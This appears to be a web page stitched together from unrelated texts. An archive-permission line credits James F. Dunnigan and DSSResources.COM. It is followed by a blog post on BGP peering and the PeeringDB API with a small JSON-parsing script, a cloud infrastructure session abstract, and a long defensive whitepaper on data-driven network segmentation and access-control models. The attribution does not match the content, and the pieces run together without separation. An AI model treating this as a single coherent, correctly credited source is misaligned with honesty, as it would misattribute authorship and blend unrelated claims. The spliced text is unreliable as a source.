James F. Dunnigan provided permission to archive this article and feature it at DSSResources.COM on Monday, December 7, 2003. This article was posted at DSSResources.COM on May 28, 2004.
When networks exchange traffic without having a customer-provider relationship, this is called peering. We’ve talked about peering in previous Noction blog posts, such as Peering Request Etiquette, What should your peering policy look like? and Where do networks interconnect? As explained in that last blog post, there’s private and public peering. Private peering happens over a direct interconnect between the two networks involved and public peering happens over an internet exchange (IX).
Once you start looking at connecting to one or more IXes, you’ll soon find that the larger ones have many members. Fortunately, most IXes have route servers. When you peer with the IX’s route server(s), you automatically peer with all other members who also peer with the route server(s). So that’s a good start. But typically, you’ll also want to peer with other networks that don’t peer with route servers. This involves sending out large numbers of emails to potential peering partners as outlined in the Peering Request Etiquette blog post. Then, if everything happens according to plan, you’ll get a message back that the other network also wants to peer with you, and peering can commence.
At that point, you’ll have to configure one or more routers with the right information to set up a BGP session towards your new peering partner’s router. It is of course perfectly possible to find the contact info of prospective peering partners on the website of the IX or IXes you’re connected to, and then exchange the BGP session details through email. However, in practice this is a lot of work because contact info on the IX websites is often incomplete, and the BGP session details in email are unstructured, so there’s a lot of copy/paste involved.
A better way to handle this is through PeeringDB.com.
PeeringDB is a website that has information about internet exchanges and the networks that connect to those IXes. For each network, there’s a lot of information that is relevant to prospective peering partners:
- Mostly inbound traffic (access ISP) or outbound traffic (content network)
- Numbers of IPv4 and IPv6 prefixes announced
- Geographic scope: global, regional or smaller
- (Sometimes) traffic levels
- At which IXes the network is present
- Peering policy: open, selective or restrictive, in the latter cases often with a description of the policy
- Contact information
And, once you’ve agreed to peer, for each IX there’s the AS number (yes, some networks use different AS numbers in different locations!) as well as their router’s IPv4 and IPv6 addresses.
So if a peering partner has their correct information filled in on PeeringDB, you can use the website to find all the information you need to configure your BGP sessions. Well, except for your BGP MD5 passwords. You can find all this information on PeeringDB without registering an account, but obviously it's a good idea to sign up and fill in your own information for others to find. Then, rather than list the relevant information in your peering request emails, you can simply include a link to your PeeringDB record.
However, searching PeeringDB for information and then copying that information to a router configuration in order to set up BGP is still inefficient and error-prone. A better way to do this is to retrieve the desired information directly from PeeringDB using SQL queries or API calls. Unfortunately, PeeringDB no longer supports querying the database using SQL, so it’s necessary to interact with the database through the PeeringDB REST API, which requires more steps to reach the same results.
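To make that concrete, here is a minimal sketch of consuming the API with only the standard library. It assumes the public REST layout where a request such as `GET https://www.peeringdb.com/api/netixlan?asn=<ASN>` returns a network's per-IX connection records (AS number, IPv4/IPv6 addresses); the response below is an abridged, made-up example of that shape, using documentation ASN and addresses:

```python
import json

# Abridged, illustrative example of the JSON shape returned by
# GET https://www.peeringdb.com/api/netixlan?asn=64500
# (AS64500 and the addresses are documentation values, not real peers).
sample = json.loads("""
{"data": [
  {"name": "Example-IX", "asn": 64500,
   "ipaddr4": "192.0.2.10", "ipaddr6": "2001:db8::10"},
  {"name": "Other-IX", "asn": 64500,
   "ipaddr4": "198.51.100.7", "ipaddr6": null}
]}
""")

def neighbor_statements(api_response):
    """Turn netixlan-style records into generic BGP neighbor statements."""
    lines = []
    for rec in api_response["data"]:
        for addr in (rec["ipaddr4"], rec["ipaddr6"]):
            if addr:  # ipaddr6 may be null if the peer is IPv4-only there
                lines.append(f"neighbor {addr} remote-as {rec['asn']}")
    return lines

for line in neighbor_statements(sample):
    print(line)
```

In a real deployment the `sample` document would come from an authenticated HTTP GET, and the emitted statements would be rendered into your router vendor's configuration syntax, but the parse-and-template step is this simple.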
Setting up a system that queries PeeringDB requires a good amount of work up front, but once that's done, creating router configurations becomes much easier. As a service to the community, we plan on publishing more extensive information on how to generate router configurations based on the PeeringDB contents in the near future.
At the core of cloud (public, private, hybrid) next generation data centers are software defined data infrastructures that exist to protect, preserve and serve applications and data, along with their resulting information services. Software defined data infrastructure core components include hardware, software, servers and storage configured (defined) to provide various services enabling application Performance, Availability, Capacity and Economics (PACE). Just as there are different types of environments, applications and workloads, various options, technologies and techniques exist for cloud services (and underlying data infrastructures). Join us in this session to discuss trends, technologies, tools, techniques and services options for cloud infrastructures.
- Data Infrastructures exist to support applications and their underlying resource needs
- Software Defined Infrastructures (SDDI) are what enable Software Defined Data Centers and clouds
- Various types of clouds along with cloud services that determine how resources get defined
- When, where, why and how to use cloud Infrastructures along with associated resources
The convergence of the digital and physical domains will allow billions of devices to interact and exchange data in the new connected world. Important information will be pushed out to machines, to individuals, and to organizations of every type, anywhere in the world. Securing the entire ecosystem of devices, applications, users, and systems will be critically important to ensuring that only authorized data is being exchanged among different entities. Before devices can interact with each other or with humans, identifying them, building trust between devices, and creating a session context will be at the core of any secure architecture. This paper presents a segmentation framework that breaks an infrastructure into individual components and builds connection points between the relevant components based on the understanding of applications, users, consumers, threat actors, and devices.
The concept of segmentation is nothing new. In ancient history, Romans created fighting units based on the ethnic and geographic identity of captured warriors. The idea was simple: group the warriors with similar backgrounds together so they can bond and eventually become better fighting units. Throughout history, this concept has been used as a basis for creating religious, ethnic, geographic, gender-based, and political groups. As we look at the digital world, organizations have been performing user, traffic, or data segmentation through logical or physical means to protect core parts of their infrastructure.
Consolidating and centralizing the network infrastructure has been a key driver for segmentation. Previously isolated application infrastructures are now migrating to common shared physical and virtual networks that require separation to maintain some level of isolation. Similarly, networks have gone through a dramatic shift over the past few years with the introduction of virtualization, containers, smartphones, tablets, wireless connectivity and, of late, the Internet of Things (IoT). Organizations have used policy enforcement through technologies such as VLANs, virtual routing and forwarding (VRF), and virtual firewalls as popular methods of providing network segmentation. The obvious question that comes to mind is, if organizations are already segmenting their network components, why do we need to discuss this topic? Before we answer this question, let us present a few data points.
Network Designs: The traditional network architectures were built by placing the jewels of the crown (the data) in a well-guarded castle (the data center). You get a comfortable feeling that all your critical resources are protected by a strong perimeter and nothing can pass through your defenses if not explicitly allowed. The biggest flaw with this design is: What if an unauthorized entity is already inside the castle? What if the unauthorized entity already has access to the jewels? What if the unauthorized entity has found a way to move the jewels out of your castle?
Organizations with limited segmentation and hundreds of users and applications typically experience the N*M problem, where N is the number of user groups and M is the number of critical resources, as shown in Figure 1. In plain English, every user group has access to pretty much every application in the enterprise network.
Figure 1: User Group to Resource (N*M) Relationship
The N*M problem gets worse if access is provided at an individual user level without grouping users by a set of common characteristics. Using the principle of least privilege helps simplify this problem by explicitly allowing user groups to access authorized resources. If the authorized resources are grouped together for each user group, the magnitude of this issue is reduced to just N+M. Take a closer look at the direction of the arrows in Figure 2, which illustrates a one-way segmentation policy allowing user groups to have appropriate access to the authorized resources.
Figure 2: User Group to Resource (N+M) Relationship
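The scale of the difference is easy to see with a quick calculation. A minimal sketch; the group counts are illustrative:

```python
# Compare the number of access relationships to manage when every user
# group can reach every resource group (N*M) versus a least-privilege
# model where each user group maps to its one authorized resource group (N+M).

def full_mesh_rules(user_groups: int, resource_groups: int) -> int:
    """Every user group is allowed to reach every resource group."""
    return user_groups * resource_groups

def least_privilege_rules(user_groups: int, resource_groups: int) -> int:
    """Each group is defined once; access is granted only along
    explicit one-way group-to-resource mappings."""
    return user_groups + resource_groups

# Illustrative numbers: 40 user groups, 25 resource groups.
print(full_mesh_rules(40, 25))        # 1000 relationships to audit
print(least_privilege_rules(40, 25))  # 65 definitions to audit
```

The gap widens as the environment grows, which is why grouping by common characteristics pays off long before any enforcement technology is chosen.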
Data Breaches: We can all agree that the security landscape has changed in the last few years. Cyber attacks are becoming more sophisticated and targeted. If you look at recent data breaches, one thing that stands out is the layout of those networks. To keep up with business demand, most companies with large networks overlook most aspects of security, at times rendering their networks virtually flat. Additionally, most organizations have limited traffic visibility and lack properly defined segmentation policies. These data breaches demonstrate that once malicious actors have penetrated your perimeter defenses, they can roam freely in your network. As part of their reconnaissance activity, they try to determine ways to access critical resources and data. If a network is flat and users are able to access any resource with only limited security controls in place, such as authentication or IP-based access-control lists, then there is very little work an attacker needs to do to exploit those gaps.
Business Objectives: The two main goals of an organization are profitability and productivity. In many cases, organizations end up growing their network infrastructure to keep up with the demand of users and consumers. This problem is usually exacerbated by inorganic growth through acquisitions where two or more networks get connected through virtual tunnels as part of the integration process. This becomes a band-aid when quick integration is needed and security becomes an afterthought.
Application Security: In the past, applications and services were simpler and not as prevalent in the enterprise. Only a handful of applications were used throughout an enterprise by a select group of users. The applications were placed in a data center protected by a set of security and monitoring products. Although this model is relatively simple, it lacks protection for the applications that are hosted within the data center. Additionally, applications are usually grouped and separated by firewalls. However, this model lacks protection for communication between two apps when they are a part of the same app group.
User and Data Mobility: Users are not confined to the physical perimeter of an office. In this digital era there are no boundaries. Conventional data protection models do not apply anymore. Users can be anywhere, using any device, accessing data anytime, and connected through wired, wireless, or mobile infrastructure. With the evolution of smart devices, access to data is not restricted to corporate-issued devices. It does not matter how secure your castle is if the jewels are not inside the castle. Data itself could be anywhere – enterprise data center, cloud (public, private, hybrid), or a partner’s network, to name a few possibilities.
Data Visibility and Monitoring: More than 50 percent of cyber attacks are not even detected by the organization for months. If you do not have full visibility into your IT infrastructure, if you do not know who is accessing your network, what they are doing, where they are coming from, what devices they are using, and how they are hopping from one part of the network to another, how do you position yourself to defend against the threats they pose (intentionally or unintentionally, directly or indirectly)? Monitoring becomes an even bigger challenge with a lack of defined zones to determine traffic patterns.
Once-acceptable security measures such as segmenting the network, configuring VLANs, deploying firewalls, and creating virtual routing tables no longer suffice. Placing users and apps into VLANs and filtering traffic through access-control lists achieves limited traffic separation. With network virtualization, cloud adoption, and proliferation of devices, it is imperative to look at the entire context of the connection before allowing access to critical data. With cyber threats evolving, providing segmentation strictly at the network layer is not enough to ensure complete data protection.
Data-Driven Segmentation Framework
What is needed is a new approach that can cater to today’s application-focused business environment, that can combine threat intelligence from various sources, and that can build a complete context around end-to-end data connections. This is an approach that can dynamically compartmentalize these data connections based on the understanding of applications, users, consumers, threat actors, and devices by building appropriate access-control methods. Currently there is no framework that breaks an infrastructure into individual components, builds connections between the relevant components, and then applies access-control models for complete traffic separation. We need a framework that is beyond the technical controls and products that are often deployed as band-aids to address these security concerns, a framework that provides senior management and network architects a blueprint to ensure that segmentation is an indispensable part of the overall strategy.
This paper presents a framework, shown in Figure 3, that centers around the business-critical resources of an enterprise. This framework helps to identify elements requiring access to those resources, builds walls around those elements, and then applies an access-control policy to authorize connections. Completing the segmentation process exercise described in this paper forces organizations to evaluate their cybersecurity program in detail, as true segmentation can only be achieved once all parts of the enterprise are evaluated at a micro level, including breaking up the infrastructure components into objects and building appropriate relationships.
Figure 3: Data-Driven Segmentation Framework
The framework is composed of the following components:
Business Critical Resource: The proposed framework starts by logically breaking up the network infrastructure and placing the business-critical resource at the center of the architecture. The business-critical resource could be anything you want to protect from unauthorized users or objects. For example, if you are in the retail business, it could be your PCI network. If you are in the healthcare industry, it could be the servers housing patient information. If you are in the automobile industry, it could be the systems containing the blueprints for your next car. What is important is that you have a process in place that gives you visibility into your network elements and tells you what each resource is worth to you if it is compromised. You must determine the risk involved if data is leaked to an unauthorized entity.
Objects: Once you know what your critical resources are, the next step is to break up your network architecture into different objects. These objects are discrete elements that are used to exchange data content. Common examples of objects include your user community, the devices that get access to your network, the applications that offer or host data for your consumption, and the systems that provide connectivity to applications. Here, you are identifying all elements that either reside on the network or need access to your data. Not only that, you are identifying these objects to understand data exchange flows.
The impact of these objects on building a segmentation model is significantly enhanced when you start identifying the subelements for each object. Users belonging to the sales, engineering, services, marketing, human resources, and partner organizations could all be examples of users’ sub objects. See Table 1 for a list of subelements for each object definition.
| Object | Definition | Examples of Sub Objects |
| --- | --- | --- |
| Users | Objects that can provide assigned identity information | Sales, engineering, services, marketing, human resources, partner organizations |
| Devices | Objects that require access to your infrastructure for requesting and receiving data | Corporate-issued laptops, corporate-issued mobile devices, personal mobile devices, IT-owned printers and scanners |
| Systems | Objects that control data connectivity between applications and devices | Virtual hosts, hypervisors, software images, backend databases |
| Applications | Objects that provide direct or indirect access to data through some interface | Web servers, AD/DNS/NTP servers |
Identifying and creating sub objects will allow organizations to build trust relationships between these elements. The trust relationships could be established between two distinct objects or sub objects and could also be established between two sub objects of the same element. As shown in Figure 4, two applications, Active Directory (AD) and Network Time Protocol (NTP), are identified in an enterprise. Based on their relationship and data interaction, the objects belonging to AD need to communicate with the objects in NTP to synchronize their clocks. The question is, do you need to provide access to the objects in NTP when they try to access objects in AD? The answer depends on your network implementation. Don't blindly permit full communication between those objects. If there is a genuine need for the NTP servers to communicate with the AD servers, then allow it explicitly.
Figure 4: App to App Segmentation
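The one-way AD-to-NTP relationship in Figure 4 can be expressed as a default-deny allow list keyed on (source, destination) application pairs. A minimal sketch, with the application names taken from the example:

```python
# Explicit one-way trust: AD servers may query NTP for time sync,
# but NTP servers get no implicit access back to AD.
ALLOWED_FLOWS = {
    ("ad", "ntp"),   # clock synchronization only
}

def authorize(src_app: str, dst_app: str) -> bool:
    """Default-deny: only explicitly listed flows are permitted."""
    return (src_app, dst_app) in ALLOWED_FLOWS

print(authorize("ad", "ntp"))   # True
print(authorize("ntp", "ad"))   # False: no blind reverse permission
```

Because the tuple is ordered, permitting a flow in one direction never implies the reverse; any return path has to be added deliberately.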
Segmentation policies allow organizations to validate requests originating from source objects against a trust model, and then provide ways to apply an appropriate enforcement action to protect the destination object, as shown in Figure 5.
Figure 5: Segmentation Policy Example
Locations: As discussed earlier, we tend to put our jewels in a safe place by building a secure perimeter around them. What we fail to realize is that thieves might try a different approach to steal your belongings. They will not always come in from the outside. They could already be inside your safe house or could already have access to your jewels through other means. The framework needs to identify all the entry points to your critical resources. With increased adoption of cloud services, some data could be accessed outside of your control points. It is also possible that the services hosted in the cloud could have access to data in your data center.
Depending on the nature of your business, you may have an ecosystem of partners that need to access certain data. Do you know where they connect from or how they access your data? Are you sure they don’t have access to unauthorized data? The flexibility within the framework allows you to logically break apart a location into specific areas based on your organizational structure and need. See Table 2 for examples of location, their definition, and a list of sublocations.
| Location | Definition | Examples of Sub Locations |
| --- | --- | --- |
| Inside | Part of the network where users and devices connect to access the network | User, guest, lab, production subnets, VPNs, industrial control space |
| Outside | Part of the network, usually not in your control, where you may not know the users or devices that access your data | Internet, extranet |
| Cloud | Part of the network, managed and maintained by a provider, that may have access to your DMZ network | AWS, Azure, Salesforce.com |
| Vendor | Part of the network where vendors and other partners connect | Extranet, partner subnet |
With this breakdown of your network, you should be able to address whether a device belonging to the industrial control area needs access to your user network.
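One way to answer that kind of question automatically is to map source addresses to locations and sub locations. A minimal sketch using Python's standard library; the subnet assignments are purely illustrative:

```python
import ipaddress

# Illustrative subnet-to-location map; real assignments vary by network.
LOCATION_MAP = {
    ipaddress.ip_network("10.10.0.0/16"): "inside/user",
    ipaddress.ip_network("10.20.0.0/16"): "inside/industrial-control",
    ipaddress.ip_network("172.16.50.0/24"): "inside/vpn",
    ipaddress.ip_network("192.168.100.0/24"): "vendor/extranet",
}

def classify_location(ip: str) -> str:
    """Return the sub location for an address, defaulting to untrusted."""
    addr = ipaddress.ip_address(ip)
    for net, location in LOCATION_MAP.items():
        if addr in net:
            return location
    return "outside"   # anything unrecognized is treated as untrusted

print(classify_location("172.16.50.7"))   # inside/vpn
print(classify_location("8.8.8.8"))       # outside
```

A lookup like this is what lets a segmentation policy treat a request from the industrial control space differently from the same request arriving over VPN.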
Identity: One of the most important components of the framework is determining the identity of objects whether they are users, devices, or applications. It is relatively easy to figure out the identity of users through your existing user database. Do you have a process in place to determine the identity of devices or applications? Do you know if a user is requesting access to data from a corporate-issued device or from a personally owned mobile device?
Similarly, in the case of a large industrial manufacturer, there could be many vendors regularly visiting the manufacturing plant to service and troubleshoot onsite devices. It is important to determine the identity of objects that are requesting access to all parts of the network. Would you allow your vendor to have full access to your inside network?
Monitor: Any security framework is incomplete if you do not have full visibility into the network architecture. Security monitoring is achieved by collecting, inspecting and analyzing traffic at various security zones. This includes collecting data from:
- IPS systems at the edge to inspect and analyze the traffic coming into your network from the outside
- Firewalls between the different objects to discover the identity and to enforce appropriate security controls
- Device profilers to discover the types of devices trying to request network access
- NetFlow systems to help you identify the types of traffic passing through your network and, more importantly, to help you identify the usage of your applications
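As a sketch of how flow data supports segmentation monitoring, the records below are checked against an expected set of zone-to-zone paths; any flow outside that set is flagged. Zone names and record fields are illustrative, not a specific NetFlow schema:

```python
# Flows between zones that the segmentation policy expects to see.
EXPECTED = {("user", "dmz"), ("dmz", "datacenter")}

# Simplified flow records as they might be summarized from a collector.
flows = [
    {"src_zone": "user", "dst_zone": "dmz", "bytes": 12000},
    {"src_zone": "user", "dst_zone": "datacenter", "bytes": 9000},   # suspicious
    {"src_zone": "guest", "dst_zone": "industrial", "bytes": 300},   # suspicious
]

def unexpected_flows(records):
    """Return flows whose zone pair is not in the expected set."""
    return [f for f in records if (f["src_zone"], f["dst_zone"]) not in EXPECTED]

for f in unexpected_flows(flows):
    print(f"ALERT: {f['src_zone']} -> {f['dst_zone']} ({f['bytes']} bytes)")
```

Even this coarse check surfaces the lateral movement patterns that flat networks hide; real deployments would enrich the records with identity and application data.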
Operational Security: Many people often think that information and network security is just about technology and products, focusing on their reliability and sophistication. They often neglect to assess their business goals against the security risks to their assets. The lack of credible and relevant security operational processes typically contributes to security breaches, including theft of personal and/or confidential data. For example, in case of a data breach, do you know:
- Which device was patient zero?
- How did the attackers get access to the data?
- How long does it take to detect something malicious happening?
- How long does it take to contain the incident?
- What processes were followed by the operations staff to detect anomalies?
- What is the life cycle of the incident?
- Were patch-management or incident-management processes followed properly?
These are just some examples, but the list can be much longer. The goal is to define a set of sub processes for each high-level process (or operational area), then build metrics for each sub process. More importantly, assemble these metrics into a model that can be used to track operational improvement.
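As a sketch of such metrics, the fragment below computes mean time to detect and mean time to contain from hypothetical incident records; field names and dates are illustrative:

```python
from datetime import datetime

# Hypothetical incident records: when the compromise started, when it
# was detected, and when it was contained.
incidents = [
    {"start": datetime(2023, 1, 1), "detected": datetime(2023, 1, 31),
     "contained": datetime(2023, 2, 2)},
    {"start": datetime(2023, 3, 10), "detected": datetime(2023, 3, 12),
     "contained": datetime(2023, 3, 13)},
]

def mean_days(records, frm, to):
    """Average number of days between two timestamps across incidents."""
    deltas = [(r[to] - r[frm]).days for r in records]
    return sum(deltas) / len(deltas)

mttd = mean_days(incidents, "start", "detected")      # mean time to detect
mttc = mean_days(incidents, "detected", "contained")  # mean time to contain
print(mttd, mttc)  # 16.0 1.5
```

Tracking these numbers per sub process over time is what turns the question list above into a measurable improvement model.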
Behavioral Analytics: Out of all the different components discussed so far, behavioral analytics is the most important. It pulls everything together and completes this framework. Once you know which devices are connecting to your network, which applications are being hosted, who is requesting access, and where the objects are located, you can build a comprehensive context for a connection request and create a segmentation policy to authorize or reject the session. To achieve this you need to have the following modules in place:
- Identity module to discover objects (users, devices, applications, systems)
- Location module to know where a request is originating
- Monitoring module to collect data from all the appropriate sources (such as routers, firewalls, switches, NG-IPS, profilers, applications, hypervisors)
- Operational Security module for the analysts in a security operations center (SOC) to investigate anomalies and contain security incidents
Figure 6 provides an example where a user belonging to the sales team is requesting access to a database containing contact information for all customers in the region. The request is from an iPad currently located in the user’s home. How do we know about this connection’s attributes? Let's break it down. Assuming that the database and its front-end application are housed in a secure data center with no external access, the user has two options to access customer information:
- Connect from the corporate network
- Establish a secure connection (for example, SSL VPN) into your network
If a connection request comes from the subnet assigned for VPN users, we know the user is located outside the corporate network (perhaps in their home). Based on authentication credentials, the user is placed into the sales container. Finally, a profiler helps identify the type of device and places it into the iPad segment. Now that we have all the information for this request, behavioral analytics applies the access model for an authorization action and isolates the connection.
Figure 6: Segmentation Policy Based on Context
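The decision in Figure 6 can be sketched as a context lookup: the full tuple of user group, device profile, and location must match a policy entry before any resource access is granted. All group, profile, and resource names here are illustrative:

```python
# Context-aware segmentation policy. The full connection context must
# match a rule; anything unmatched is denied by default.
POLICY = [
    {"user_group": "sales", "device_profile": "ipad", "location": "vpn",
     "allow": {"crm-frontend"}},
    {"user_group": "sales", "device_profile": "corporate-laptop", "location": "inside",
     "allow": {"crm-frontend", "crm-database"}},
]

def authorize(context: dict, resource: str) -> bool:
    for rule in POLICY:
        if all(rule[k] == context[k]
               for k in ("user_group", "device_profile", "location")):
            return resource in rule["allow"]
    return False  # default deny when no rule matches the full context

# The Figure 6 scenario: a sales user on an iPad, connecting over VPN.
ctx = {"user_group": "sales", "device_profile": "ipad", "location": "vpn"}
print(authorize(ctx, "crm-frontend"))  # True
print(authorize(ctx, "crm-database"))  # False: iPad over VPN gets front-end only
```

The same user on a corporate laptop inside the network would match a different rule and receive broader access, which is exactly the behavioral distinction the framework aims for.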
The beauty of this framework is that it can help you compartmentalize any object. Whether you have applications hosting data in the cloud, hosts containing data in a data center, or applications with access to data residing both in the cloud and the private data center, the framework provides you the tools to build object-specific zones, create connection context, and apply an access-control model dynamically.
Having a strategy for segmentation in the enterprise is fundamental to ensuring the success of the implementation. When designing for segmentation, most network architects or engineers focus on the larger network zones: DMZ, Core, Datacenter, WAN, Campus, and so on. While this is a good first step, it is not nearly enough to tackle today’s security threats. Most opportunistic attackers take advantage of the fact that there is limited segregation, allowing them to roam around the network unfettered.
A framework is only useful if there is an implementation strategy around it. The strategy should be comprehensive enough to provide all the tools that an enterprise needs to protect its jewels. This paper illustrates a segmentation strategy lifecycle that begins by identifying existing resources and onboarding any new asset or resource. Each of the steps is discussed in more detail in the following sub-sections.
Figure 7: Segmentation Strategy Steps
Identification: As mentioned earlier, segmentation should be based on the value of a critical business asset or resource, not simply on network boundaries. The first move of an attacker is reconnaissance. That is essentially what the first step of the segmentation strategy should be: identifying resources (both data and assets).
To protect (or compromise) a network, it is important to gather intelligence about the various weaknesses that may exist on the network. These weaknesses are exploited by attackers to encroach on other resources to the point where the attackers have privileged access to all critical resources. This makes any type of resource, even one that is considered to have low value, extremely valuable if it is used as the entry point into the network and leads to a more valuable target. The questions to ask are:
- What is the impact to a resource if compromised?
- What is the likelihood of a resource being compromised?
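A common way to combine these two questions is a simple impact-times-likelihood rating. A sketch; the scales, thresholds, and asset values are illustrative, not a prescribed methodology:

```python
# Simple risk rating: score = impact x likelihood, each on a 1-5 scale.
def risk_score(impact: int, likelihood: int) -> int:
    assert 1 <= impact <= 5 and 1 <= likelihood <= 5
    return impact * likelihood

def risk_band(score: int) -> str:
    """Bucket a raw score into a coarse rating."""
    if score >= 15:
        return "high"
    if score >= 8:
        return "medium"
    return "low"

# A cardholder-data server: catastrophic impact, moderate likelihood.
print(risk_band(risk_score(5, 3)))  # high
# A development SMTP server: low impact, moderate likelihood.
print(risk_band(risk_score(2, 3)))  # low
```

The point is not the arithmetic but the ranking it produces: segmentation effort should be spent first on the assets that land in the highest band.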
These assets, or objects, are primarily digital in nature and can include, but are not limited to:
- Hardware: servers, network devices, workstations, handheld devices, IP phones, physical security components, and connected peripherals and accessories such as printers, scanners, and voice and video collaboration tools
- Software: operating systems, server and client applications, firmware
- Documentation: network diagrams, asset information, product designs, employee information
The value of an asset is not based on the value of its physical hardware but rather on the value of the data it contains. If an iPad containing private information about your employees is stolen, the total value of the loss is not merely the cost of replacing a $500 iPad.
Classification: The result of this exercise is a comprehensive view of the resources on the network along with their risk classification and rating. Organizations should understand how various resources relate to each other, and not treat them individually. A low-value target may ultimately provide access to a very high-value target, so the entire chain should be protected with ample controls. Depending on the size of the organization, this could be one of the most time-consuming steps. Various methodologies and/or frameworks can be followed to perform a thorough assessment of the resources that exist in the network.
You should now be able to move on to the next steps of creating a segmentation policy that uses the value of each asset to determine how it should be protected. For example, if user workstations are treated as a low-value target but are used to compromise a system that is of high value, such as an employee database, the workstations should also be segmented depending on the resources they are accessing.
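Whether a low-value asset provides a path to a high-value one can be checked by searching the graph of access relationships. A sketch with a hypothetical topology:

```python
from collections import deque

# Directed "can reach" edges between assets; an illustrative topology in
# which ordinary workstations can ultimately reach the employee database.
ACCESS = {
    "workstation": ["file-share"],
    "file-share": ["hr-app"],
    "hr-app": ["hr-database"],
    "printer": [],
}

def reachable(src: str, dst: str) -> bool:
    """Breadth-first search over the access graph."""
    seen, queue = {src}, deque([src])
    while queue:
        node = queue.popleft()
        if node == dst:
            return True
        for nxt in ACCESS.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return False

print(reachable("workstation", "hr-database"))  # True: a chain worth segmenting
print(reachable("printer", "hr-database"))      # False
```

Any asset from which a high-value target is reachable inherits part of that target's protection requirements, which is why classification must consider chains rather than individual hosts.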
Policy Creation: Most cybersecurity programs do not explicitly call for a segmentation policy. It is usually mentioned indirectly in various topics within the program, which unfortunately does not place sufficient importance or value on it. For example, an access-control policy may call out how an HR employee should not be able to access Finance systems. This can be done simply through an access-control list on a firewall along with VLANs, which may protect the resource, but does not necessarily focus on segmentation itself.
A segmentation policy should be built based on data gathered about the resources in the previous steps. This policy should start at a high level, which segregates the various zones through traditional network boundaries, such as DMZ, Datacenter, and Campus, then gradually drills into each zone. This process should continue all the way to the application itself, essentially moving up the layers of the OSI model. Once all objects (and even sub-objects) have been discovered, the policy should be developed based on the type and location of those objects and on the users who are requesting access to various resources hosting or containing data. How deep one goes depends on the criticality of the asset, since in certain cases the cost associated with going through the entire process for a certain asset may not be justified.
Figure 8: Drilling into Zones
Consider two assets: the first, a server that holds credit card information and the second an SMTP server used by a development team for internal testing. Compromise of either asset would result in some loss; however, one is a lot more valuable than the other. Losing customer credit card data can result in huge damages, both monetary and legal, to the organization. This requires an organization to allocate ample resources to ensure that such an asset is well protected.
Once a segmentation policy has been created, it is time to implement these controls through various access-control models.
Access-Control Modeling: There are multiple access-control models to choose from. Which model is used depends on the scenario.
Network engineers are most familiar with network-based ACLs, and while they are a good way to control access between the larger zones, it is difficult to make them granular, especially since they are mostly static and become difficult to manage over time. The model we adopt is a hybrid, one that does not rely entirely on OSI Layer 3 and Layer 4 information but also takes several access-control models into consideration. These include, but are not limited to:
- Attribute Based Access Control (ABAC)
- Role Based Access Control (RBAC)
- Identity Based Access Control (IBAC)
- Rules Based Access Control (RuBAC)
An example of an access-control model is provided in Table 3.
| Object | Matching Attributes | Assigned Group | Authorization |
| --- | --- | --- | --- |
| HR user on corporate Windows workstation | User group: HR; endpoint profile: Windows; device auth: successful | HR | Access to HR systems and web proxy |
| HP printer | Endpoint profile: HP printer; device auth: successful | Printer | Access from print server only |
One solution that enables you to implement the described model is Cisco TrustSec.
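The rows of Table 3 can be read as a hybrid model: attributes classify an endpoint into a group (ABAC-style), and the group carries the authorization (RBAC-style). A sketch of that evaluation in plain Python; the attribute names are illustrative, and this is not a TrustSec API:

```python
# Step 1: attribute conditions that classify an endpoint into a group.
CLASSIFICATION = [
    ({"user_group": "HR", "profile": "windows-workstation", "auth": "success"}, "hr"),
    ({"profile": "hp-printer", "auth": "success"}, "printer"),
]

# Step 2: each group's authorized resources.
AUTHORIZATION = {
    "hr": {"hr-systems", "web-proxy"},
    "printer": {"print-server"},
}

def classify(attrs: dict) -> str:
    for required, group in CLASSIFICATION:
        if all(attrs.get(k) == v for k, v in required.items()):
            return group
    return "quarantine"  # unknown endpoints are granted nothing

def allowed(attrs: dict, resource: str) -> bool:
    return resource in AUTHORIZATION.get(classify(attrs), set())

hr_pc = {"user_group": "HR", "profile": "windows-workstation", "auth": "success"}
print(allowed(hr_pc, "hr-systems"))    # True
print(allowed(hr_pc, "print-server"))  # False
```

Separating classification from authorization keeps the rule set at N+M scale: new endpoints only need a classification entry, and new resources only need a group mapping.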
Execution: Once an access-control model has been defined and the appropriate policies have been mapped in this model, the next step is to implement these controls. This involves thorough planning, which will lead to the procurement, design, and implementation of the relevant technologies. This can be broken down into the following phases:
Figure 9: Execution Phases
Plan and Procure: This phase of execution entails coming up with a list of requirements to satisfy the goals of the segmentation strategy. Once you have an accurate understanding of what to protect and what to protect against, the next step is to determine what tools, techniques, and procedures are required to provide this protection. What is important is to not start by implementing a segmentation strategy across the entire organization. This leads to high costs and requires a large pool of resources. Based on your data/resource classification and the access-control model, build an implementation plan by prioritizing parts of your organization that handle and store business-critical data. You will not have a fully segmented infrastructure overnight. It is a journey that could take months or in some cases years. The right strategy from day one will guarantee success in the most cost-effective way.
The entire execution needs to be carried out through proper program management. Multiple teams will need to be coordinated: IT, Procurement, HR, Finance, and Legal, with a fair bit of cross-team dialogue to guarantee smooth progress.
Once the requirements are clear, the organization may float an RFP (directly or indirectly through a partner), and based on responses evaluate which technologies are best suited to implement the controls required for segmentation. It is highly recommended that those technologies be validated through pilots or proof of concepts to ensure that they satisfy the requirements and pass the various smoke tests. Missing out on a key feature may cause unwanted delays and in some cases a workaround or compromise that may lead to security issues at a later stage.
Design: In most cases, the organization’s lead architect or an external consultant will oversee the design created by the product vendors. The design, when it comes to segmentation, should focus on the core elements, including:
- Location: Where in the network is the resource, and how is it segmented from the rest of the network?
- Device and Application: Does the resource need access to other resources? And do other resources need access to it? For example, a multi-tier application may have a front-end (web), middleware, or back-end (database). Is each service running in its own container and what are the privileges that each service has for the others? What is the relationship between the services?
- User: User devices in normal circumstances do not need to communicate directly with each other. How is this being handled? What can the users access? How does the organization certify that a user’s endpoint has the same level of access regardless of the location?
The design is based on the vendor testing conducted in their own environment to ensure all features and functionality promised during the initial planning and procurement phase work as expected. If multiple vendors are involved and integration among them is required, that integration should be tested on the organization’s staging network during the implementation phase.
During this phase, or earlier, it is important to identify the pilot setup, which will involve getting multiple stakeholders and staff involved. The purpose of the pilot is to test all features with the resources (people, processes, techniques, and technologies) so any challenges and issues are resolved before the rollout to the full enterprise.
Once the design is complete, it is time to start the implementation. At this point, any hardware or software should have been delivered. In the case of hardware, it should be racked, stacked, connected, and powered up, with preliminary power-on self-test (POST) checks run to ensure that it is booting up correctly.
Implement and Test: The implementation phase assumes that all the hardware has been tested and is working as expected. Any components that may have failed during the POST tests should have been replaced and be ready for configuration. The implementation should follow a plan that is created based on the design. This includes the detailed configuration that the vendors have already tested and verified in their environments during the design phase.
